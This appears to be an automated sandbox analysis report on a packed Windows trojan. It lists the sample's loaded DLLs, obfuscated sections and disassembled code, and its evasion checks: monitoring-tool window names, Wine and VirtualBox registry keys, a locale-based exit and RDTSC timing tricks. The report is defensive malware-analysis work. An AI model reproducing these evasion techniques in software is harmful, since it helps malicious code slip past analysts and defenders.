
Static PE information: Section: iinbofzt ZLIB complexity 0.9948670885464936

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00549600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00543720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00543720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OU5DW4AE.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1813504 > 1048576

Source: file.exe

Static PE information: Raw size of iinbofzt is bigger than: 0x100000 < 0x194a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00549860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1bb645 should be: 0x1bad49

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: iinbofzt
Source: file.exe	Static PE information: section name: gnwcqqyo
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A150B8 push edx; mov dword ptr [esp], 5FBE8D00h	0_2_00A150EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A150B8 push 6CD5B4B7h; mov dword ptr [esp], esi	0_2_00A151B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00990084 push edx; mov dword ptr [esp], esi	0_2_0099014A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6 push 06CB0136h; mov dword ptr [esp], esi	0_2_0081B17C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6 push esi; mov dword ptr [esp], 59B914C9h	0_2_0081B192
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009908F9 push 10C74FE0h; mov dword ptr [esp], eax	0_2_00990930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054B035 push ecx; ret	0_2_0054B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009790E7 push 3A35086Fh; mov dword ptr [esp], edi	0_2_00979106
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009790E7 push 5C194CE4h; mov dword ptr [esp], esi	0_2_0097913D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A13804 push 233AAE31h; mov dword ptr [esp], ecx	0_2_00A13831
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097D024 push 6477A542h; mov dword ptr [esp], edi	0_2_0097D0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00974057 push 3A240A94h; mov dword ptr [esp], ecx	0_2_00974076
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088487C push ebx; mov dword ptr [esp], 00000000h	0_2_00884911
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093B869 push 1E2E79E6h; mov dword ptr [esp], esi	0_2_0093B8A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BA989 push ecx; mov dword ptr [esp], ebx	0_2_009BA9BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00951180 push esi; mov dword ptr [esp], ecx	0_2_009511CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00951180 push ebp; mov dword ptr [esp], eax	0_2_009511D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009999BB push ebp; mov dword ptr [esp], 384CD99Dh	0_2_00999A1F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CF1AD push ecx; mov dword ptr [esp], ebx	0_2_009CF1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push 32EDA461h; mov dword ptr [esp], ebx	0_2_008EF9E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ecx	0_2_008EFA41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push 43A76670h; mov dword ptr [esp], ebx	0_2_008EFA49
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ebx	0_2_008EFA8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009081F5 push 58972CD5h; mov dword ptr [esp], ecx	0_2_009081FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push 1CD28792h; mov dword ptr [esp], edi	0_2_0084B1EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push 0890CBDAh; mov dword ptr [esp], eax	0_2_0084B2CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push edx; mov dword ptr [esp], edi	0_2_0084B31C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push esi; mov dword ptr [esp], 5FFB9B9Fh	0_2_0084B34B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC150 push ebp; mov dword ptr [esp], edx	0_2_009CC24A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC150 push 3214D443h; mov dword ptr [esp], ebx	0_2_009CC252
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CD1AD push ecx; mov dword ptr [esp], 2ADFF4EBh	0_2_007CD1C4

Source: file.exe

Static PE information: section name: iinbofzt entropy: 7.954146839777977

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00549860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791B46 second address: 791B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90068A second address: 90068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90068E second address: 900694 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900694 second address: 90069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90069E second address: 9006A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791B5C second address: 791B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AC61 second address: 90AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEF2 second address: 90AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEFB second address: 90AF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AF01 second address: 90AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B475 second address: 90B47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B47B second address: 90B47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B47F second address: 90B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B48B second address: 90B4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B4A6 second address: 90B4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007FFBC8B2DA96h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FFBC8B2DA98h 0x00000023 jmp 00007FFBC8B2DA9Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB11 second address: 90DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB17 second address: 90DB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB1B second address: 90DB2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB2A second address: 90DB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB3B second address: 90DB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB45 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FFBC8B2DA9Fh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FFBC8B2DAA6h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FFBC8B2DAA3h 0x00000020 jmp 00007FFBC8B2DA9Dh 0x00000025 pop eax 0x00000026 jmp 00007FFBC8B2DA9Ah 0x0000002b push dword ptr [ebp+122D0595h] 0x00000031 mov dword ptr [ebp+122D30BCh], ecx 0x00000037 call dword ptr [ebp+122D1DD7h] 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D189Fh], edi 0x00000044 xor eax, eax 0x00000046 jmp 00007FFBC8B2DAA0h 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f mov dword ptr [ebp+122D189Fh], esi 0x00000055 mov dword ptr [ebp+122D39AAh], eax 0x0000005b jmp 00007FFBC8B2DA9Ch 0x00000060 jmp 00007FFBC8B2DAA7h 0x00000065 mov esi, 0000003Ch 0x0000006a jmp 00007FFBC8B2DAA9h 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jmp 00007FFBC8B2DAA6h 0x00000078 clc 0x00000079 lodsw 0x0000007b stc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D189Fh], edx 0x0000008b nop 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DBE7 second address: 90DC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FFBC91A3BE7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jp 00007FFBC91A3BE0h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE3h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DC3C second address: 90DC65 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC8B2DA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DC65 second address: 90DD08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edi, dword ptr [ebp+122D37CEh] 0x0000000f add esi, dword ptr [ebp+122D3746h] 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D3826h] 0x0000001d push 00000000h 0x0000001f jmp 00007FFBC91A3BE6h 0x00000024 push 00000003h 0x00000026 mov edx, dword ptr [ebp+122D3A66h] 0x0000002c push 9506531Fh 0x00000031 je 00007FFBC91A3BEDh 0x00000037 push esi 0x00000038 jmp 00007FFBC91A3BE5h 0x0000003d pop esi 0x0000003e add dword ptr [esp], 2AF9ACE1h 0x00000045 mov edi, 0E020BDAh 0x0000004a lea ebx, dword ptr [ebp+1244FA57h] 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FFBC91A3BD8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+122D1F7Eh] 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD08 second address: 90DD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD0C second address: 90DD16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD16 second address: 90DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DAA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DDDA second address: 90DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DDDE second address: 90DE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007FFBC8B2DA98h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFBC8B2DA9Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE0F second address: 90DE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFBC91A3BD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE24 second address: 90DE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE47 second address: 90DE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE58 second address: 90DE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE5C second address: 90DEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BDCh 0x0000000f jnp 00007FFBC91A3BD6h 0x00000015 popad 0x00000016 pop eax 0x00000017 jmp 00007FFBC91A3BDBh 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D3956h] 0x00000024 mov di, si 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D36A2h], edi 0x0000002f push 00000003h 0x00000031 call 00007FFBC91A3BE1h 0x00000036 je 00007FFBC91A3BEFh 0x0000003c jmp 00007FFBC91A3BE9h 0x00000041 pop edx 0x00000042 push 8F5C633Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a je 00007FFBC91A3BD6h 0x00000050 pop ebx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DEDC second address: 90DEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DEF9 second address: 90DF2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4F5C633Eh 0x00000013 lea ebx, dword ptr [ebp+1244FA60h] 0x00000019 mov cl, ah 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFB2 second address: 90DFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFC8 second address: 90DFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFCC second address: 90DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d clc 0x0000000e pop edi 0x0000000f mov dword ptr [ebp+122D2499h], ebx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 sub edi, dword ptr [ebp+122D1FE8h] 0x0000001e push 4B40D591h 0x00000023 pushad 0x00000024 jl 00007FFBC8B2DA9Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFF8 second address: 90E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FFBC91A3BD6h 0x0000000b jns 00007FFBC91A3BD6h 0x00000011 popad 0x00000012 popad 0x00000013 xor dword ptr [esp], 4B40D511h 0x0000001a sbb edx, 3EFCA9F4h 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D24A8h], esi 0x00000028 push 00000000h 0x0000002a jmp 00007FFBC91A3BE4h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FFBC91A3BD8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor cl, FFFFFFFAh 0x0000004e push E06D08B2h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FFBC91A3BD6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90E06A second address: 90E087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5BA second address: 92E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5BF second address: 92E5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5C7 second address: 92E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 902198 second address: 90219C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90219C second address: 9021A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4C9 second address: 92C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4D1 second address: 92C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4D5 second address: 92C4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92CF1D second address: 92CF36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BDBh 0x0000000d ja 00007FFBC91A3BD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D0A7 second address: 92D0AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D0AC second address: 92D0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FFBC91A3BDEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D213 second address: 92D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DAA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D236 second address: 92D23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
